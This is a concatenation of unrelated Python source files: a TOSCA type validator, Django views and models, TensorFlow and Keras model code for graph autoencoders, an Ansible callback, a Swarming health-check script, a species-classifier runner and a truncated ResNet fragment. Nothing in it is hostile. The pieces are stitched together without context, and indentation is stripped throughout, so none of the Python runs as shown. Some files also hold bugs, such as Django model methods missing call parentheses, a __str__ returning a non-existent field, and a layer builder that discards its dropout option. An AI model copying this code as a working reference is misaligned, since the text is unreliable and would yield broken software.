``service_template`` under the root presenter. The first of these can optionally be a function,
in which case it will be called to convert type names. This can be used to support shorthand
type names, aliases, etc.
"""
type_name = presentation.derived_from
if type_name is None:
return None
types_dict_names, convert = parse_types_dict_names(types_dict_names)
types_dict = context.presentation.get('service_template', *types_dict_names) or {}
if convert:
type_name = convert(context, type_name, types_dict)
# Make sure not derived from self
if type_name == presentation._name:
return None
# Make sure derived from type exists
elif type_name not in types_dict:
return None
else:
# Make sure derivation hierarchy is not circular
hierarchy = [presentation._name]
presentation_copy = presentation
while presentation_copy.derived_from is not None:
derived_from = presentation_copy.derived_from
if convert:
derived_from = convert(context, derived_from, types_dict)
if derived_from == presentation_copy._name or derived_from not in types_dict:
return None
presentation_copy = types_dict[derived_from]
if presentation_copy._name in hierarchy:
return None
hierarchy.append(presentation_copy._name)
return types_dict[type_name]
def report_issue_for_unknown_type(context, presentation, type_name, field_name, value=None):
if value is None:
value = getattr(presentation, field_name)
context.validation.report(u'"{0}" refers to an unknown {1} in "{2}": {3}'
.format(field_name, type_name, presentation._fullname,
safe_repr(value)),
locator=presentation._get_child_locator(field_name),
level=Issue.BETWEEN_TYPES)
def report_issue_for_parent_is_self(context, presentation, field_name):
context.validation.report(u'parent type of "{0}" is self'.format(presentation._fullname),
locator=presentation._get_child_locator(field_name),
level=Issue.BETWEEN_TYPES)
def report_issue_for_unknown_parent_type(context, presentation, field_name):
context.validation.report(u'unknown parent type "{0}" in "{1}"'
.format(getattr(presentation, field_name), presentation._fullname),
locator=presentation._get_child_locator(field_name),
level=Issue.BETWEEN_TYPES)
def report_issue_for_circular_type_hierarchy(context, presentation, field_name):
context.validation.report(u'"{0}" of "{1}" creates a circular type hierarchy'
.format(getattr(presentation, field_name), presentation._fullname),
locator=presentation._get_child_locator(field_name),
level=Issue.BETWEEN_TYPES)
|
from django.shortcuts import render
# Create your views here.
from django.template import loader
from django.http import HttpResponse
from dashboard.vars import *
def search(request):
template = loader.get_template('home.html')
# Validate user
if request.user.get_username():
username = request.user.username.lower()
else:
username = 'none'
groups = ''
#is_admin = request.user.groups.filter(name='CloudAdmin').exists()
# if not is_admin:
# return render(request, '404.html', {})
data = {
'username': username,
'groups': groups,
'project_name': project_name,
'static_files_domain': static_files_domain
}
return HttpResponse(template.render(data, request))
|
from django.db import models
from django.contrib.auth.models import User
from datetime import datetime
from django.db.models.signals import post_save
from django.dispatch import receiver
import cloudinary
from cloudinary.models import CloudinaryField
class Neighbourhood(models.Model):
user = models.ForeignKey('Profile', null=True, blank=True, on_delete=models.CASCADE)
name=models.CharField(max_length=60, null=True)
description=models.CharField(max_length=400, null=True)
location=models.CharField(max_length=200, null=True)
population=models.IntegerField()
image = CloudinaryField( null = True, blank = True)
def __str__(self):
return self.name
def create_neigbourhood(self):
self.save()
def delete_neigbourhood(self):
self.delete()
@classmethod
def find_neighbourhood(cls,id):
neighbourhood = cls.objects.get(id=id)
return neighbourhood
def update_neighbourhood(self,name):
self.name = name
self.save()
def __str__(self):
return f'{self.name}'
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='profile')
bio = models.TextField(max_length=254, blank=True)
image =CloudinaryField(default='default.jpg')
hood = models.ForeignKey(Neighbourhood, on_delete=models.SET_NULL, null=True, related_name='users', blank=True)
def __str__(self):
return f'{self.user.username} profile'
class Business(models.Model):
user = models.OneToOneField(User, null=True, blank=True, on_delete=models.CASCADE)
name=models.CharField(max_length=60, null=True)
description=models.CharField(max_length=400, null=True)
neighborhood=models.ForeignKey(Neighbourhood,on_delete=models.CASCADE)
email=models.EmailField()
image =CloudinaryField(default='default.jpg')
def __str__(self):
return self.name
def create_business(self):
self.save()
def delete_business(self):
self.delete()
class Post(models.Model):
title = models.CharField(max_length=40)
post_description = models.CharField(max_length=50)
posted_by = models.ForeignKey(User,on_delete=models.CASCADE)
neighbourhood = models.ForeignKey('Neighbourhood',on_delete=models.CASCADE)
posted_on = models.DateTimeField(auto_now_add=True)
image= CloudinaryField(default='default.jpg')
def __str__(self):
return self.name
def save_post(self):
self.save
def delete_post(self):
self.delete
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# __coconut_hash__ = 0xff55eb1
# Compiled with Coconut version 1.2.3-post_dev1 [Colonel]
# Coconut Header: --------------------------------------------------------
from __future__ import print_function, absolute_import, unicode_literals, division
import sys as _coconut_sys, os.path as _coconut_os_path
_coconut_file_path = _coconut_os_path.dirname(_coconut_os_path.abspath(__file__))
_coconut_sys.path.insert(0, _coconut_file_path)
from __coconut__ import _coconut, _coconut_MatchError, _coconut_tail_call, _coconut_tco, _coconut_igetitem, _coconut_compose, _coconut_pipe, _coconut_starpipe, _coconut_backpipe, _coconut_backstarpipe, _coconut_bool_and, _coconut_bool_or, _coconut_minus, _coconut_map, _coconut_partial
from __coconut__ import *
_coconut_sys.path.remove(_coconut_file_path)
# Compiled Coconut: ------------------------------------------------------
from .base_class import Base
from .inputs import GeneralInputs
from .inputs import Inputs
import tensorflow as tf
from tfinterface.decorators import return_self
from tfinterface.decorators import with_graph_as_default
from tfinterface.decorators import copy_self
from abc import abstractmethod
import os
from tfinterface import utils
import numpy as np
class ModelBase(Base):
def __init__(self, name, graph=None, sess=None, model_path=None, logs_path="logs", seed=None):
super(ModelBase, self).__init__(name, graph=graph, sess=sess)
with self.graph.as_default():
self.seed = seed
self.model_path = model_path if model_path else name
self.logs_path = logs_path
if self.seed is not None:
tf.set_random_seed(self.seed)
@return_self
@with_graph_as_default
def initialize(self, restore=False, model_path=None):
if not restore:
self.sess.run(tf.global_variables_initializer())
else:
var_list = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name)
model_path = (os.path.abspath)((self.model_path if not model_path else model_path))
tf.train.Saver().restore(self.sess, model_path)
@return_self
@with_graph_as_default
def save(self, model_path=None):
model_path = (os.path.abspath)((self.model_path if not model_path else model_path))
utils.make_dirs_for_path(model_path)
tf.train.Saver().save(self.sess, model_path)
@with_graph_as_default
def get_variables(self, graph_keys=tf.GraphKeys.TRAINABLE_VARIABLES, scope=None):
scope = scope if scope else self.name
return tf.get_collection(graph_keys, scope=scope)
@with_graph_as_default
def count_weights(self, *args, **kwargs):
return ((np.sum)((list)((_coconut.functools.partial(map, np.prod))((_coconut.functools.partial(map, _coconut.operator.methodcaller("as_list")))((_coconut.functools.partial(map, _coconut.operator.methodcaller("get_shape")))(self.get_variables(*args, **kwargs)))))))
class Model(ModelBase):
@abstractmethod
def predict(self, *args, **kwargs):
pass
def batch_predict(self, generator, print_fn=None, **kwargs):
preds_list = []
for batch in generator:
kwargs = kwargs.copy()
kwargs.update(batch)
preds = self.predict(**kwargs)
preds_list.append(preds)
if print_fn:
print_fn(batch)
return np.concatenate(preds_list, axis=0)
|
from __future__ import division, absolute_import
import sys
sys.path.append('..')
from functools import partial
from math import ceil
import pandas as pd
import numpy as np
from numpy.random import seed
import tensorflow as tf
from tensorflow import set_random_seed
import keras.backend as K
from keras.layers import Input, BatchNormalization, Activation, add, Lambda, Layer, LeakyReLU
from keras.models import Model
from keras.optimizers import Adam
from keras import regularizers
from keras.callbacks import EarlyStopping, ReduceLROnPlateau, Callback
from keras.losses import mean_squared_error
from keras.wrappers.scikit_learn import KerasRegressor
from custom_layers.tied_graph_autoencoder import TiedGraphAutoencoder, TiedGraphAutoencoderFP, neighbour_lookup, create_vni_vxi
from utils.data_gen import mask_atoms_by_degree
from NGF.preprocessing import tensorise_smiles
from sklearn.model_selection import train_test_split, StratifiedKFold
from skopt.utils import use_named_args
""" csv_path = '../datasets/cmap_canonical_smiles.csv'
smiles = pd.read_csv(csv_path, index_col=0)
smiles = smiles.loc[(smiles['Atoms'] >= 9) & (smiles['Atoms'] <= 62) & (smiles['0'] != 666)]
print(smiles)
smiles_x = np.array(smiles['0'])
# Specify model callbacks on training
es = EarlyStopping(monitor='val_loss',patience=5, min_delta=0)
rlr = ReduceLROnPlateau(monitor='val_loss',factor=0.5, patience=3, verbose=1, min_lr=0.0000001)
model_params = {
"num_layers" : 1,
"max_atoms" : 62,
"num_atom_features" : 62,
"num_atom_features_original" : 62,
"num_bond_features" : 6,
"max_degree" : 5,
"conv_width" : [84],
"fp_length" : [512],
"activ_enc" : "selu",
"activ_dec" : "selu",
"learning_rates" : [0.0078850884983896],
"learning_rates_fp": [0.0065],
"losses_conv" : {
"neighbor_output": "mean_squared_error",
"self_output": "mean_squared_error",
},
"lossWeights" : {"neighbor_output": 1.5, "self_output": 1.0},
"metrics" : "mse",
"loss_fp" : "mean_squared_error",
"enc_layer_names" : ["enc_1", "enc_2", "enc_3"],
'callbacks' : [es,rlr],
'adam_decay': 0.0005329142291371636,
'beta': 5,
'p': 0.004465204118126482
}
train_params = {
"epochs": 1,
"batch_size" : 256,
"validation_split" : 0.15
} """
def encode_smiles(max_atoms, num_atom_features, max_degree, num_bond_features):
atoms = Input(name='atoms', shape=(max_atoms, num_atom_features))
bonds = Input(name='bonds', shape=(max_atoms, max_degree, num_bond_features))
edges = Input(name='edge_inputs', shape=(max_atoms, max_degree), dtype='int32')
return atoms, bonds, edges
def stage_creator(model_params, layer, conv=True):
"""
Returns a set of stage I or II encoders and decoders as well as the appropriate datasets for training.
Inputs:
params: a list of parameters for the models that include max_atoms, number of atom and bond features seperately,
max_degree, conv_width, fp_length, activ_enc, activ_dec, optimizer, losses(dict), lossWeights(dict)
and metrics
layer: the layer for which we are creating the autoencoder
conv: choice between graph convolution(True) or graph fingerprint(False)
Output: model_dec
where:
model_dec: the decoder part of the model which also includes the model for the encoder (can be shown in summary)
"""
params = model_params.copy()
layer = layer - 1
atoms, bonds, edges = encode_smiles(params["max_atoms"],
params["num_atom_features"],
params["max_degree"],
params["num_bond_features"])
if conv:
assert params["conv_width"] is not None
print(f"LAYER {layer}")
if layer > 0:
atoms = Input(name='atom_feature_inputs', shape=(params["max_atoms"], params['conv_width'][layer-1]))
params['num_atom_features'] = params['conv_width'][layer-1]
# Stage I model
vxip1 = TiedGraphAutoencoder(params["conv_width"][layer],
original_atom_bond_features= None,
activ=None,
bias=True,
init='glorot_normal',
encode_only=True,
activity_reg = partial(sparse_reg, p=params['p'], beta=params['beta']))([atoms, bonds, edges])
#partial(sparse_reg, p=params['p'], beta=params['beta'])
vxip1 = BatchNormalization(momentum=0.6)(vxip1)
#if layer > 0:
vxip1 = LeakyReLU(alpha=0.3, name='vxi_plus_one')(vxip1)
#else:
#vxip1 = Activation('selu', name='vxi_plus_one')(vxip1)
model_enc = Model(inputs=[atoms, bonds, edges], outputs=[vxip1], name="graph_conv_encoder")
model_enc.name = params["enc_layer_names"][layer]
[vni_dot, vxi_dot] = TiedGraphAutoencoder(params["conv_width"][layer],
original_atom_bond_features=(params["num_atom_features"]+params["num_bond_features"]),
activ=None,
bias=True,
init='glorot_normal',
decode_only=True,
tied_to=model_enc.layers[3])([model_enc([atoms, bonds, edges]), bonds, edges])
model_dec_pre_act = Model(inputs=[atoms, bonds, edges], outputs=[vni_dot, vxi_dot])
vni_dot = BatchNormalization(momentum=0.6)(vni_dot)
#if layer > 0:
vni_dot = LeakyReLU(alpha=0.3, name="neighbor_output")(vni_dot)
#else:
# vni_dot = Activation('selu', name="neighbor_output")(vni_dot)
vxi_dot = BatchNormalization(momentum=0.6)(vxi_dot)
vxi_dot = Activation('selu', name="self_output")(vxi_dot)
model_dec_after_act = Model(inputs=[atoms, bonds, edges], outputs=[vni_dot, vxi_dot])
else:
assert params["fp_length"] is not None
# Stage II model
vxip1 = Input(name='vxip1', shape=(params["max_atoms"], params["conv_width"][layer]))
fp_out = TiedGraphAutoencoderFP(params["fp_length"][layer],
activ=None,
bias=True,
init='glorot_normal',
encode=True,
original_atom_bond_features=(params["conv_width"][layer]+ params["num_bond_features"]))([vxip1, bonds, edges])
fp_out = BatchNormalization(momentum=0.6)(fp_out)
fp_out = Activation('softmax')(fp_out)
model_enc = Model(inputs=[vxip1, bonds, edges], outputs=[fp_out], name='encoder_fp')
model_enc.name = params["enc_layer_names"][layer] + "_fp"
vxi_dot_fp = TiedGraphAutoencoderFP(params["fp_length"][layer],
activ=None,
bias=True,
init='lecun_normal',
decode=True,
original_atom_bond_features=(params["conv_width"][layer] + params["num_bond_features"]),
tied_to=model_enc.layers[3])([model_enc([vxip1, bonds, edges]), bonds, edges])
vxi_dot_fp = BatchNormalization(momentum=0.6)(vxi_dot_fp)
vxi_dot_fp = Activation('selu')(vxi_dot_fp)
model_dec = Model(inputs=[vxip1, bonds, edges], outputs=vxi_dot_fp)
if conv:
return model_enc, model_dec_pre_act, model_dec_after_act
else:
return model_dec, model_enc
def untrainable(layer):
assert isinstance(layer, Layer)
layer.trainable = False
return layer
def custom_mse(y_true, y_pred, val_loss):
mse = mean_squared_error(y_true, y_pred)
return mse + val_loss
def accumulative_loss(stage_I_val_loss):
def original(y_true, y_pred):
return custom_mse(y_true, y_pred, stage_I_val_loss)
return original
def add_new_layer(model_enc_old, params, train_params, layer, X):
"""
Adds a new TiedAutoencoder layer instance to the model and sets every other layer as non_trainable in order to train only the
new one. Used for greedy-layer wise autoencoder training.
Inputs:
model_old: the existing Model of the autoencoder so far
new_layer: the layer which we want to add to the autoencoder, must have the same structure as the old one
TiedAutoencoderEnc
BatchNorm
Activation --> this structure defines the model_enc Model
--(new layer is inserted here with the same structure as the previous)--
TiedAutoencoderDec (tied to the first)
BatchNorm
Activation --> with the corresponding outputs of the model
params: the model_params dict
train_params: the model training parameters
layer: the current layer number
Outputs:
a new model with updated layers
the encoder part of the new model for the next layer training
"""
X_atoms, X_bonds, X_edges = X
atoms, bonds, edges = encode_smiles(params["max_atoms"],
params["num_atom_features_original"],
params["max_degree"],
params["num_bond_features"])
# For a start, make every other layer non trainable
model_enc_old.name = "stage_I_encoder_layer_" + str(layer-1)
model_enc_old.load_weights('layer_{}_stage_I_enc_weights.h5'.format(layer-1))
model_enc_old.trainable = False
#Create a new encoder for the next stage
new_enc, new_dec, _ = stage_creator(params, layer, conv=True)
new_enc.name = 'stage_I_encoder_layer_' + str(layer)
new_dec.name = 'stage_I_autoencoder_layer_' + str(layer)
vxip1 = model_enc_old([atoms, bonds, edges])
vxip1_new = new_enc([vxip1, bonds, edges])
create_vni_vxi_part = partial(create_vni_vxi, bonds=bonds, edges=edges)
vni, vxi = Lambda(create_vni_vxi_part)(vxip1)
vni_dot = new_dec([vxip1, bonds, edges])[0]
vxi_dot = new_dec([vxip1, bonds, edges])[1]
vni_dot = BatchNormalization(momentum=0.6)(vni_dot)
vni_dot = Activation(params["activ_dec"], name="neighbor_output")(vni_dot)
vxi_dot = BatchNormalization(momentum=0.6)(vxi_dot)
vxi_dot = Activation(params["activ_dec"], name="self_output")(vxi_dot)
enc = Model(inputs = [atoms, bonds, edges], outputs=[vxip1_new])
opt = Adam(lr=params["learning_rates"][layer-1], beta_1=0.9, beta_2=0.999, epsilon=1e-8,
decay=params['adam_decay'], amsgrad=False)
new = Model(inputs=[atoms, bonds, edges], outputs = [vni_dot, vxi_dot])
new.compile(optimizer=opt,metrics=['mse'], loss=['mse', 'mse'], target_tensors=[vni, vxi])
new.fit(x=[X_atoms, X_bonds, X_edges],
epochs=train_params['epochs'],
batch_size=train_params['batch_size'],
validation_split=train_params['validation_split'],
callbacks=params['callbacks'],
verbose=1)
# Set the weights for the next encoder equal to the trained ones from the new autoencoder encoder part
# Then, save the new encoders weights into an h5 file for later use
enc_weights = new.layers[-5].layers[3].get_weights()
enc.layers[-1].set_weights(enc_weights)
enc.save_weights('layer_{}_stage_I_enc_weights.h5'.format(layer))
new.layers[-5].layers[3].save_weights('layer_{}_stage_I_enc_weights_true.h5'.format(layer))
#print(enc.summary())
return new, enc
def add_new_layer_fp(model_enc_old, params, train_params, layer, X):
pass
def multistage_autoenc(smiles_x, num_layers, params, train_params):
# Create empty lists for outputs
#val_losses = []
# X_atom, X_bond, X_edge = tensorise_smiles(smiles_x[:2], max_degree=5, max_atoms=60)
print('Processing SMILES...')
#X, val = train_test_split(smiles_x, test_size=train_params["validation_split"], shuffle=True,
#random_state = np.random.randint(1, 10000))
X_atoms, X_bonds, X_edges = tensorise_smiles(smiles_x, max_degree=5, max_atoms=params['max_atoms'])
#X_atoms_val, X_bonds_val, X_edges_val = tensorise_smiles(val, max_degree=5, max_atoms=params['max_atoms'])
vni, vxi = vni_vxi(X_atoms, X_bonds, X_edges)
#vni_val, vxi_val = vni_vxi(X_atoms_val, X_bonds_val, X_edges_val)
# Iterate for every layer
for layer in range(1, num_layers+1):
opt = Adam(lr=params["learning_rates"][layer-1], beta_1=0.9, beta_2=0.999, epsilon=1e-8,
decay=params['adam_decay'], amsgrad=False)
#########################################################################
######################### STAGE I #######################################
#########################################################################
#gen = GraphDataGen(X, train_params['batch_size'], params, shuffle=False)
#valid = GraphDataGen(val, train_params['batch_size'], params, shuffle=False
if layer == 1:
stage_I_enc, _, stage_I_dec = stage_creator(params, layer, conv=True)
stage_I_dec.compile(optimizer=opt, loss=params['losses_conv'], metrics=['mse'])
stage_I_dec.fit(x=[X_atoms, X_bonds, X_edges], y=[vni, vxi], epochs=train_params['epochs'],validation_split=0.1,
callbacks=params['callbacks'],
batch_size=train_params['batch_size'])
stage_I_enc = stage_I_dec.layers[3]
stage_I_enc.save_weights('layer_{}_stage_I_enc_weights.h5'.format(layer))
#val_losses.append(stage_I_dec.evaluate(x=[X_atoms_val, X_bonds_val, X_edges_val], y=[vni_val, vxi_val])[0])
else:
stage_I_dec, stage_I_enc = add_new_layer(stage_I_enc, params, train_params, layer, X=[X_atoms, X_bonds, X_edges])
#########################################################################
######################### STAGE II ######################################
#########################################################################
stage_I_encodings = stage_I_enc.predict([X_atoms, X_bonds, X_edges])
_, vxi_II = vni_vxi(stage_I_encodings, X_bonds, X_edges)
stage_II_dec, stage_II_enc = stage_creator(params, layer, conv=False)
opt = Adam(lr=params["learning_rates_fp"][layer-1], beta_1=0.9, beta_2=0.999, epsilon=1e-8,
decay=params['adam_decay'], amsgrad=False)
stage_II_dec.compile(optimizer=opt, loss=params['loss_fp'], metrics=['mse'])
stage_II_dec.fit([stage_I_encodings, X_bonds, X_edges], y=[vxi_II],
epochs=train_params['epochs'],
validation_split=train_params['validation_split'],
callbacks=params['callbacks'],
batch_size=train_params['batch_size'],
verbose=1)
stage_II_enc.save_weights(f'layer_{layer}_stage_II_enc_weights.h5')
#stage_I_encodings_val = stage_I_enc.predict([X_atoms_val, X_bonds_val, X_edges_val])
#_, vxi_val = vni_vxi(stage_I_encodings_val, X_bonds_val, X_edges_val)
def sparse_reg(activ_matrix, p, beta):
p_hat = K.mean(activ_matrix) # average over the batch samples
#KLD = p*(K.log(p)-K.log(p_hat)) + (1-p)*(K.log(1-p)-K.log(1-p_hat))
KLD = p*(K.log(p/p_hat)) + (1-p)*(K.log((1-p)/(1-p_hat)))
return beta * K.sum(KLD) # sum over the layer units
def vni_vxi(atoms, bonds, edges):
vni, _ = mask_atoms_by_degree(atoms,edges,bonds = bonds)
summed_bond_features = np.sum(bonds, axis=-2)
vxi = np.concatenate([atoms, summed_bond_features], axis=-1)
return vni, vxi
|
# Copyright 2016 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" debug module is the new name of the human_readably module """
from __future__ import (absolute_import, division, print_function)
from ansible.plugins.callback.default \
import CallbackModule as CallbackModule_default
__metaclass__ = type
class CallbackModule(CallbackModule_default): # pylint: \
# disable=too-few-public-methods,no-init
'''
Override for the default callback module.
Render std err/out outside of the rest of the result which it prints with
indentation.
'''
CALLBACK_VERSION = 2.0
CALLBACK_TYPE = 'stdout'
CALLBACK_NAME = 'debug'
def _dump_results(self, result):
'''Return the text to output for a result.'''
# Enable JSON identation
result['_ansible_verbose_always'] = True
save = {}
for key in ['stdout', 'stdout_lines', 'stderr', 'stderr_lines', 'msg']:
if key in result:
save[key] = result.pop(key)
output = CallbackModule_default._dump_results(self, result)
for key in ['stdout', 'stderr', 'msg']:
if key in save and save[key]:
output += '\n\n%s:\n\n%s\n' % (key.upper(), save[key])
for key, value in save.items():
result[key] = value
return output
|
#!/usr/bin/env python
# Copyright 2018 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Check the health of a Swarming version."""
import argparse
import collections
import functools
import json
import os
import subprocess
import sys
import time
HERE = os.path.dirname(__file__)
SWARMING_TOOL = os.path.join(HERE, '..', '..', '..', 'client', 'swarming.py')
def retry_exception(exc_type, max_attempts, delay):
"""Decorator to retry a function on failure with linear backoff.
Args:
exc_type: The type of exception raised by the function to retry.
max_attempts: Maximum number of times to call the function before reraising
the exception.
delay: Time to sleep between attempts, in seconds.
Returns:
A decorator to be applied to the function.
"""
def deco(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
for _ in range(max_attempts - 1):
try:
return fn(*args, **kwargs)
except exc_type:
time.sleep(delay)
return fn(*args, **kwargs)
return wrapper
return deco
@retry_exception(ValueError, 12, 10)
def pick_best_pool(url, server_version):
"""Pick the best pool to run the health check task on.
Asks the specified swarming server for a list of all bots, filters those
running the specified server version, and returns the pool with the most bots
in it.
Args:
url: The swarming server to query.
server_version: Which server version to filter bots by.
Returns:
A string indicating the best pool to run the health check task on.
"""
output = subprocess.check_output([
SWARMING_TOOL, 'query',
'-S', url,
'--limit', '0',
'bots/list?dimensions=server_version:%s' % server_version,
])
data = json.loads(output)
bots = data.get('items', [])
pool_counts = collections.Counter()
for bot in bots:
for dimension in bot.get('dimensions', []):
if dimension['key'] == 'pool':
pool_counts.update(dimension['value'])
if not pool_counts:
raise ValueError('No bots are running server_version=%s' % server_version)
return pool_counts.most_common(1)[0][0]
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--pool',
help='Pool to schedule a task on. If unspecified, this is autodetected.')
parser.add_argument('appid')
parser.add_argument('server_version')
args = parser.parse_args()
url = 'https://{server_version}-dot-{appid}.appspot.com'.format(
appid=args.appid,
server_version=args.server_version)
print 'Swarming server:', url
pool = args.pool
if not pool:
print 'Finding best pool to use'
pool = pick_best_pool(url, args.server_version)
print 'Scheduling no-op task on pool %r' % pool
rv = subprocess.call([
SWARMING_TOOL, 'run',
'-S', url,
'--expiration', '120',
'--hard-timeout', '120',
'-d', 'pool', pool,
'-d', 'server_version', args.server_version,
'--raw-cmd', '--', 'python', '-c', 'pass'])
if rv != 0:
print>>sys.stderr, 'Failed to run no-op task'
return 2
return 0
if __name__ == '__main__':
sys.exit(main())
|
r"""Run a species classifier.
This script is the classifier counterpart to detection/run_tf_detector_batch.py.
This script takes as input:
1) a detections JSON file, usually the output of run_tf_detector_batch.py or the
output of the Batch API in the "Batch processing API output format"
2) a path to a directory containing crops of bounding boxes from the detections
JSON file
3) a path to a PyTorch TorchScript compiled model file
4) (if the model is EfficientNet) an image size
By default, this script overwrites the detections JSON file, adding in
classification results. To output a new JSON file, use the --output argument.
Example usage:
python run_classifier.py \
detections.json \
/path/to/crops \
/path/to/model.pt \
--image-size 224
"""
from __future__ import annotations
import argparse
from collections.abc import Callable, Sequence
import json
import os
from typing import Any, Optional
import pandas as pd
import PIL
import torch
import torch.utils
import torchvision as tv
from torchvision.datasets.folder import default_loader
from tqdm import tqdm
from classification import train_classifier
class SimpleDataset(torch.utils.data.Dataset):
"""Very simple dataset."""
def __init__(self, img_files: Sequence[str],
images_dir: Optional[str] = None,
transform: Optional[Callable[[PIL.Image.Image], Any]] = None):
"""Creates a SimpleDataset."""
self.img_files = img_files
self.images_dir = images_dir
self.transform = transform
def __getitem__(self, index: int) -> tuple[Any, str]:
"""
Returns: tuple, (img, img_file)
"""
img_file = self.img_files[index]
if self.images_dir is not None:
img_path = os.path.join(self.images_dir, img_file)
else:
img_path = img_file
img = default_loader(img_path)
if self.transform is not None:
img = self.transform(img)
return img, img_file
def __len__(self) -> int:
return len(self.img_files)
def create_loader(cropped_images_dir: str,
detections_json_path: Optional[str],
img_size: int,
batch_size: int,
num_workers: int
) -> torch.utils.data.DataLoader:
"""Creates a DataLoader.
Args:
cropped_images_dir: str, path to image crops
detections: optional dict, detections JSON
"""
crop_files = []
if detections_json_path is None:
# recursively find all files in cropped_images_dir
for subdir, _, files in os.walk(cropped_images_dir):
for file_name in files:
rel_dir = os.path.relpath(subdir, cropped_images_dir)
rel_file = os.path.join(rel_dir, file_name)
crop_files.append(rel_file)
else:
# only find crops of images from detections JSON
print('Loading detections JSON')
with open(detections_json_path, 'r') as f:
js = json.load(f)
detections = {img['file']: img for img in js['images']}
for img_file, info_dict in tqdm(detections.items()):
if 'detections' not in info_dict or info_dict['detections'] is None:
continue
for i in range(len(info_dict['detections'])):
crop_filename = img_file + f'___crop{i:02d}_mdv4.1.jpg'
crop_path = os.path.join(cropped_images_dir, crop_filename)
if os.path.exists(crop_path):
crop_files.append(crop_filename)
transform = tv.transforms.Compose([
# resizes smaller edge to img_size
tv.transforms.Resize(img_size, interpolation=PIL.Image.BICUBIC),
tv.transforms.CenterCrop(img_size),
tv.transforms.ToTensor(),
tv.transforms.Normalize(mean=train_classifier.MEANS,
std=train_classifier.STDS, inplace=True)
])
dataset = SimpleDataset(img_files=crop_files, images_dir=cropped_images_dir,
transform=transform)
assert len(dataset) > 0
loader = torch.utils.data.DataLoader(
dataset, batch_size=batch_size, num_workers=num_workers,
pin_memory=True)
return loader
def main(model_path: str,
cropped_images_dir: str,
output_csv_path: str,
detections_json_path: Optional[str],
classifier_categories_json_path: Optional[str],
img_size: int,
batch_size: int,
num_workers: int) -> None:
"""Main function."""
# evaluating with accimage is much faster than Pillow or Pillow-SIMD
tv.set_image_backend('accimage')
# create dataset
print('Creating data loader')
loader = create_loader(
cropped_images_dir, detections_json_path=detections_json_path,
img_size=img_size, batch_size=batch_size, num_workers=num_workers)
label_names = None
if classifier_categories_json_path is not None:
with open(classifier_categories_json_path, 'r') as f:
categories = json.load(f)
label_names = [categories[str(i)] for i in range(len(categories))]
# create model
print('Loading saved model')
model = torch.jit.load(model_path)
model, device = train_classifier.prep_device(model)
test_epoch(model, loader, device=device, label_names=label_names,
output_csv_path=output_csv_path)
def test_epoch(model: torch.nn.Module,
loader: torch.utils.data.DataLoader,
device: torch.device,
label_names: Optional[Sequence[str]],
output_csv_path: str) -> None:
"""Runs for 1 epoch.
Writes results to the output CSV in batches.
Args:
model: torch.nn.Module
loader: torch.utils.data.DataLoader
device: torch.device
label_names: optional list of str, label names
output_csv_path: str
"""
# set dropout and BN layers to eval mode
model.eval()
header = True
mode = 'w' # new file on first write
with torch.no_grad():
for inputs, img_files in tqdm(loader):
inputs = inputs.to(device, non_blocking=True)
outputs = model(inputs)
probs = torch.nn.functional.softmax(outputs, dim=1).cpu().numpy()
if label_names is None:
label_names = [str(i) for i in range(probs.shape[1])]
df = pd.DataFrame(data=probs, columns=label_names,
index=pd.Index(img_files, name='path'))
df.to_csv(output_csv_path, index=True, header=header, mode=mode)
if header:
header = False
mode = 'a'
def _parse_args() -> argparse.Namespace:
"""Parses arguments."""
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Run classifier.')
parser.add_argument(
'model',
help='path to TorchScript compiled model')
parser.add_argument(
'crops_dir',
help='path to directory containing cropped images')
parser.add_argument(
'output',
help='path to save CSV file with classifier results (can use .csv.gz '
'extension for compression)')
parser.add_argument(
'-d', '--detections-json',
help='path to detections JSON file, used to filter paths within '
'crops_dir')
parser.add_argument(
'-c', '--classifier-categories',
help='path to JSON file for classifier categories. If not given, '
'classes are numbered "0", "1", "2", ...')
parser.add_argument(
'--image-size', type=int, default=224,
help='size of input image to model, usually 224px, but may be larger '
'especially for EfficientNet models')
parser.add_argument(
'--batch-size', type=int, default=1,
help='batch size for evaluating model')
parser.add_argument(
'--num-workers', type=int, default=8,
help='# of workers for data loading')
return parser.parse_args()
if __name__ == '__main__':
args = _parse_args()
main(model_path=args.model,
cropped_images_dir=args.crops_dir,
output_csv_path=args.output,
detections_json_path=args.detections_json,
classifier_categories_json_path=args.classifier_categories,
img_size=args.image_size,
batch_size=args.batch_size,
num_workers=args.num_workers)
|
#based off PyTorch implementation of ResNet with modifications
from toolz import pipe as p
from torch import nn
N_IMAGE_CHANNELS = 3
def makeConv2d(in_channels, out_channels, kernel_size=3, stride=1,
padding = 1, bias = False):
conv = nn.Conv2d(in_channels, out_channels,
kernel_size = kernel_size,
stride = stride,
padding = padding, bias = bias)
nn.init.kaiming_normal_(conv.weight, mode='fan_out',
nonlinearity='relu')
return conv
def makeBn2(num_channels):
bn = nn.BatchNorm2d(num_channels)
nn.init.constant_(bn.weight, 1)
nn.init.constant_(bn.bias, 0)
return bn
def preResLayer(out_channels = 64):
return nn.Sequential(
makeConv2d(N_IMAGE_CHANNELS, out_channels, kernel_size=7,
stride=2, padding=3),
makeBn2(out_channels),
nn.ReLU(inplace = True),
nn.MaxPool2d(kernel_size = 3, stride=2, padding=1)
)
def postResLayer(in_channels, num_classes, dropout_p = None):
blocks = [
nn.AdaptiveAvgPool2d( (1,1) ),
Lambda(flatten)]
if dropout_p is not None:
blocks.append(nn.Dropout(p=dropout_p))
blocks.append(nn.Linear(in_channels, num_classes))
return nn.Sequential(
nn.AdaptiveAvgPool2d( (1,1) ),
Lambda(flatten),
nn.Linear(in_channels, num_classes)
)
#from PyTorch Website
class Lambda(nn.Module):
def __init__(self, func):
super(Lambda, self).__init__()
self.func = func
